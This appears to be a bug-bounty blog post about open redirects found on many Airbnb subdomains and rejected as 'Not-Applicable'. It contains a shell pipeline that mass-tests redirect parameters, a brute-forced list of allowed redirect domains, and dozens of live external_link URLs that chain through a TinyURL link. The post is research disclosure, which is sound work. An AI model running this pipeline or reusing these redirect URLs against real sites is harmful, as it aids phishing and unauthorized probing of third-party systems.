Hello everyone, So I was doing the recon of Airbnb by the automation process for finding the open-redirection issues. I have successfully found the issues on 94 subdomains but it is stated as “Not-Applicable”. I show them the POC of complete exploitation by using TinyURL.
Reason: “external_link endpoint is working as intended”
Note: Nothing is mentioned in the out of scope for such issue or parameter.
So how I found that?
I have used the below command:
cat airbnb_subdomain.txt | waybackurls | tee -a waybackurls.txt
cat waybackurls.txt| grep -a -i \=http | qsreplace ‘google.com’ | while read host do;do curl -s -L $host -l |grep “google.com” && echo -e “$host \033[0;31mVulnerable\n” ;done | tee -a openredirect.txt
Sometimes the company only allowed some domains for redirection.
Why I have used “google.com”
Because it is the most trusted domain and company used many libraries of google that's why. If you know that redirection is possible then you can for other methods to bypass it with other domains.
So after finding the redirection, I have bruteforce to find the valid domains that are allowed by Airbnb and I have found below domains that are allowed.
google.com
drive.google.com
facebook.com
youtube.com
twitter.com
instagram.com
tinyurl.com → Interesting domain
box.com wp.me
medium.com
gov.uk go
fundme.com
weransfer.com
lemonde.fr
lefigaro.fr
bookmyshow.com
dol.gov
gopro.com
airbnb.com
nejm.org
play.google.com
As you all know “TinyURL” is a redirecting service that is used for redirection.
Some Airbnb subdomains:
https://ar.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://bg.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://es.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://fr.airbnb.be/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://fr.airbnb.ca/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://fr.airbnb.ch/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://ga.airbnb.ie/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://he.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://hi.airbnb.co.in/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://hr.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://it.airbnb.ch/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://ka.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://mk.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://mt.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://mt.airbnb.com.mt/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://sk.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://sq.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://sw.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://th.airbnb.com/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.ae/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.am/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.at/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.az/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.ba/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.be/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn https://www.airbnb.ca/external_link?url=https%3A%2F%2Ftinyurl.com%2F35hupktn
Impact
An attacker used this issue widely in social engineering and if the attacker found any of the issues in any of the allowed websites they can sue that to escalate it by using this domain. If any subdomain takeover issue is found it directly escalates this issue to XSS or RCE.
Comments
Post a Comment